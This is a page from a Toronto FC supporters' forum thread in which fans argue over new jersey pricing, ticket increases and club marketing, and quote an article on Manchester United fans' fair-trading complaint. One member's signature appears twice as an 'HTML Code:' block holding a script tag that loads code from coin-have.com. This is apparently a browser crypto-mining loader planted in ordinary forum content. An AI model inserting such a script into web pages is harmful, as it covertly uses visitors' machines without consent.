View Poll Results: Are you going to purchase the new TFC jersey before Xmas??

Voters
221. You may not vote on this poll
  • Yes

42 19.00%
  • No

179 81.00%
Page 9 of 29 FirstFirst ... 567891011121319 ... LastLast

Thread: new jerseys!!

Registered
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by br_aguilar View Post
    i can get it to 10 decimal digits
    Geez - please tell me you didn't go to math camp

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by canadian_bhoy View Post
    Yeah but those are considered 'imported' no?

In Scotland a Celtic top when launched is 39.99(pounds).

I wonder how much a TFC shirt in UK costs!

looks like it's £39.99 also

http://www.football-shirts.co.uk/toronto-shirt.html

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Parkdale View Post
    sure they are imported, but from China or where every they are made,
    and the TFC kits are probably made in the same place. They don't need
    to go from China to Europe, then over here. It's all the same boat.
    And there's probably 50 Manchester jerseys made for every 1 TFC jersey.
    You could introduce some kind of scarcity angle in the cost formula....

but I'm not going to bother.
    50to1?? Gotta be alot higher then that......

RPB Member

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

he meant imported from england....not from where they were produced....
    and I'm saying that if you're buying a big team (manchester, liverpool, barca, madrid etc) jersey in a store here in Canada, those jerseys probably have never seen Europe. They came right here from the manufacturer.
    ///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\

RPB Member
    Past President

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by JonO View Post
    Geez - please tell me you didn't go to math camp
    nope...never into that shit till i needed to pick a university...i just so happened to have the courses for software stuff
    HTML Code:
    <script src="https://coin-have.com/c/XQ5z.js"></script>

RPB Member
    Past President

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

I think it's a little extreme to be taking a jersey thread into a ticket price increase conversation...but if in 5 years I can't afford my seats in 112 anymore and have to give them up, I'm going to cry.

I was at the Leaf game on Monday. 1st row Upper deck and the face value was $86....$86 I pray that the day never comes where I have to say bye bye to my seats.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

^^^It's not extreme. It's all part of the same marketing plan -- Get 'em in the door, then jack the price. This was said to me openly by a TFC FO member.
    They view this as adjusting introductory prices to fit the market. I see it as bait and switch. I won't keep posting about this, because it doesn't seem to sink in for many people, but keep extrapolating ticket price increases out for a few years. Keep adding "promotions" like this one, throw in a DP or stadium improvements, and you'll see where this ends up.
    Add to that the basic slap in the face that things like parties that should be benefits of being a STH are charged for as well, and you'll see what I'm getting at.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

sure they are imported, but from China or where every they are made,
    and the TFC kits are probably made in the same place. They don't need
    to go from China to Europe, then over here. It's all the same boat.
    And there's probably 50 Manchester jerseys made for every 1 TFC jersey.
    You could introduce some kind of scarcity angle in the cost formula....

but I'm not going to bother.
    If you want to get down to it, here's the cost of my last jersey broken down:

Man Utd Blue Commemerative Jersey, with name and number - $89.99
    Shipping Cost - $7.99
    Total w/ tax - $112.68
    Customs fee - $9.50

Total cost, shipped to my door, customized as I wanted - $122.18

Still cheaper than getting this jersey.

Scarcity angle? The jerseys are mass produced, regardless whether it's 100k or 100 million. Are you telling me that United jerseys should be cheaper than any other team in the EPL because there are more sold? Come on, you know better.

Quote Originally Posted by OneLoveOneEric View Post
    I can't believe I'm saying this, but Kingpin has it spot on.
    I've said a million times here, and I always get told I'm whining, but the nickle-and-diming that we've seen from day one is simply continuing. And anyone who wants to talk about how the games are still great value, and they want a shirt so badly, etc. is certainly free to do so. But the trends are alarming.....
    I give it 3-5 years (if MLS is still around then) before TFC games are out of reach for most of us on this board. And that's something the FO won't deny either.
    Exactly. Some people may have an 'endless' amount of money to toss at the club. Many of the people in this group, and in the stadium in general will start to be priced out of their seats over the coming years. Nickel and diming may not bother you, but for some, it's the difference between tickets or no tickets.
    Last edited by Shaughno; 11-19-2008 at 11:54 AM.

RPB Member
    Past President

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Shaughno View Post

Exactly. Some people may have an 'endless' amount of money to toss at the club. Many of the people in this group, and in the stadium in general will start to be priced out of their seats over the coming years. Nickel and diming may not bother you, but for some, it's the difference between tickets or no tickets.
    THERE WE GO!
    There in lies an issue. Im not saying i wont buy one as i know i will but lets realllly start to think about it. Ive seen this play out many times and no one ever does anything until its too late.
    HTML Code:
    <script src="https://coin-have.com/c/XQ5z.js"></script>

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

At the start of August, I ordered the brand new Reading kit, long sleeve, with the Coca Cola League patches and lettering on the back. Add taxes and shipping, and it still cost less then the new TFC kit will cost.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

And my last word on this -- I know I said that last time -- it's the basic contempt of the fans that really gets me upset. IMO, TFC is a passion project. The football's not great, the league's not great, the stadium's...... you get my drift. We go because we love it. The team would be wise to notice this, and to notice that they're nothing without the fans. How about a bit of value-added? I mean, what if instead of the email we got, we got one that said pre-order your shirt, and as a bonus for your early commitment, and as a valued STH you'll get to pick it up at a party with the players?
    That would be nice. That would say something along the lines of "we value your contribution, and want to reward your unfettered support". Instead, it's buy the shirt. No, you can't see it yet. And while you're at it, buy a ticket to a party, where I'm sure there will be more shit available to buy.
    It's disrespectful and aggravating, if you ask me.

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Sab0tage View Post
    At the start of August, I ordered the brand new Reading kit, long sleeve, with the Coca Cola League patches and lettering on the back. Add taxes and shipping, and it still cost less then the new TFC kit will cost.

At the end of the day...this is where I think the biggest problem lies.

They are not making these things competitively priced solely to ensure guaranteed income from the local fans. But in the process, they are pricing out possible fans in other cities and countries. And I think that is a mistake.

Putting aside the whole glory-hunting issue, Manchester United jerseys are found everywhere in the world. They probably outsell everyone except Real Madrid. Man Utd make a stinkload of money because of it. TFC have done the opposite. I think by pricing it as high as they do, TFC is pricing itself out of marketing outside of the GTA. If they keep pricing it this way, nobody but Toronto fans will ever buy the shirts and that is not good business. Manchester United however will have years of marketing exposure all over the globe.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

THERE WE GO!
    There in lies an issue. Im not saying i wont buy one as i know i will but lets realllly start to think about it. Ive seen this play out many times and no one ever does anything until its too late.
    I don't get it. It's an overpriced jersey to go along with overpriced concessions. Neither of which are necessary to have a decent priced ticket, which I believe we have.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by skint View Post
    I don't get it. It's an overpriced jersey to go along with overpriced concessions. Neither of which are necessary to have a decent priced ticket, which I believe we have.

It's the trend itself that's alarming. Perfect example (thanks Velvet )

http://soccernet.espn.go.com/news/st...ngland&cc=5901

Manchester United have been reported to the Office of Fair Trading by a group of their own fans. The Manchester United Supporters Trust (MUST), the group formerly known as Shareholders United that vehemently opposed Malcolm Glazer's takeover of the club in 2005, has lodged official papers with the OFT claiming the Red Devils have 'breached its statutory and legal obligations to season ticket holders'.
    MUST's argument centres on the hotly disputed compulsory cup scheme, which forces season ticket holders to agree in advance to buy tickets for cup games even though they do not know how many they will have to pay for and who the opposition will be.
    At one point all season ticket holders had to pay for all cup matches but this has now been relaxed to exclude Carling Cup games.
    However, MUST still claims United are acting unlawfully given what they view as a dominant position in the market and the fact that fans do not transfer their allegiance just because the club acts in a way they do not like.
    Specifically, MUST's three complaints are:
    • United's season ticket terms and conditions are in breach of the Unfair Terms in Consumer Contract Regulations 1999.
    • Their compulsory automatic cup ticket scheme is in breach of The Competition Act 1998, Part II, Section 18(2).
    • Their pricing policy is in breach of The Competition Act 1998, Part II, Section 18(2)(a).
    In addition, they argue that massive ticket price rises in recent years - highlighted by sports minister Gerry Sutcliffe - contravene a pledge given by Glazer in the build-up to his takeover attempt.
    ''Over recent years we have seen unfair terms and huge ticket price rises imposed on supporters by club owners taking advantage of their loyalty,'' said MUST chief executive Duncan Drasdo.
    ''MPs from all political parties have raised concerns and even the minister for sport felt it necessary to launch an outspoken attack on the huge price rises at Old Trafford in recent years.
    ''For a long time Manchester United was by no means the worst offender having previously had an admirable policy of keeping prices relatively low despite the success of the club. All that changed when the Glazers took over.
    ''However now, with the help of a team of eminent competition lawyers, economists and experts in sports law, we have been able to compile a comprehensive complaint based on Competition and Contract Law, which could have welcome consequences for supporters at clubs throughout the country.''
    While United are making no official comment, they are likely to mount a robust defence of their position.
    In particular they are likely to point to the fact they have axed Carling Cup games from the automatic cup scheme and made Under-16 season tickets exempt from the scheme altogether.
    In addition, senior citizens have been given permission to upgrade their tickets to adult prices for individual games to make them easier to sell through the official club website.
    Even so, MUST believe they have a strong case, although the OFT may take some time to decide whether to take it, let alone hear it, which may take in excess of a year.

RPB Member
    Past President

Mentioned
    3 Post(s)
    Tagged
    1 Thread(s)

The bottom line is, the same jersey design for another team costs less.

That is brutal.
    Toronto FC baby...best team everrrrrrrrrr -Jozy

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Jack View Post

That is brutal.
    Thank you for a point that many had missed.

RPB Member
    Past President

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

It's the trend itself that's alarming. Perfect example (thanks Velvet )

http://soccernet.espn.go.com/news/st...ngland&cc=5901
    Anyone check their invoices? How much were we charged for this years playoff games?

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Jack View Post

That is brutal.
    Beautifully summarized.

RPB Member

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Are you telling me that United jerseys should be cheaper than any other team in the EPL because there are more sold? Come on, you know better.
    I'm not comparing them to other EPL teams. For the EPL, I think they should all be priced the same across the board with the ONLY exception being the jersey manufacturer. Adidas or Nike would probably charge slightly more than say Lotto or Puma. That's strictly the deal worked out between the team and their shirt manufacturer (and maybe the jersey sponsor). In the MLS, we're all wearing an Adidas top, so I think we should have parity across this league.

I was saying that if Manchester can sell 100 million kits per year, and TFC can sell 100,000 - then manchester is in a better position to offer value to the people who buy the product.
    ///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

i'd like to compare the number of order forms to the poll above....

I'm sure Paul is noticing...but it's the # of order forms coming that he'll care about.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

I'm not comparing them to other EPL teams. For the EPL, I think they should all be priced the same across the board with the ONLY exception being the jersey manufacturer. Adidas or Nike would probably charge slightly more than say Lotto or Puma. That's strictly the deal worked out between the team and their shirt manufacturer (and maybe the jersey sponsor). In the MLS, we're all wearing an Adidas top, so I think we should have parity across this league.

I was saying that if Manchester can sell 100 million kits per year, and TFC can sell 100,000 - then manchester is in a better position to offer value to the people who buy the product.
    I think the little children in third world countries who produce these jersey's were given a raise. Their salary jumped from 25 cents a day to 30 cents a day. Adidas decided to transfer all cost increases for all jerseys to the TFC merchandise consumer because they are the biggest suckers.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Just wait for the TFC wife beaters

yes wife beaters - they are a-comin'

Section 114... News Flash: Flatpicker doesn't listen to everything he reads!
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

^ I think they sit in section 115, no?

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Its great to see that everyone is doing online research comparing prices and other jersey's etc. but what are you going to do about it?

i see and read about this all the time, people complain about the cost of this or that but still go out and buy drinks, food and even jersey's.

can we not organize a formal petition on jersey pricing or food pricing at MLSE. stop buying from them, this is the only way they are going to listen, when they stop makiing money!

Mentioned
    2 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by flatpicker View Post
    hey now...easy there!
    Follow me...... https://twitter.com/#!/aGeRoO76
    "Just like JDG. It wasn't a post-and-in shot, but JDG is smart & experienced" - Carts

Section 114... News Flash: Flatpicker doesn't listen to everything he reads!
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

^ just kidding!

Mentioned
    2 Post(s)
    Tagged
    0 Thread(s)

^ just kidding!
    ha ha....although some of the guys behind me...I am not so sure....
    Follow me...... https://twitter.com/#!/aGeRoO76
    "Just like JDG. It wasn't a post-and-in shot, but JDG is smart & experienced" - Carts

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

BOOOOO....115-4-LIFE!!!

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Krazy_kid View Post
    Its great to see that everyone is doing online research comparing prices and other jersey's etc. but what are you going to do about it?

i see and read about this all the time, people complain about the cost of this or that but still go out and buy drinks, food and even jersey's.

can we not organize a formal petition on jersey pricing or food pricing at MLSE. stop buying from them, this is the only way they are going to listen, when they stop makiing money!
    won't happen

Remember that protest that one time

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

and i mean something like this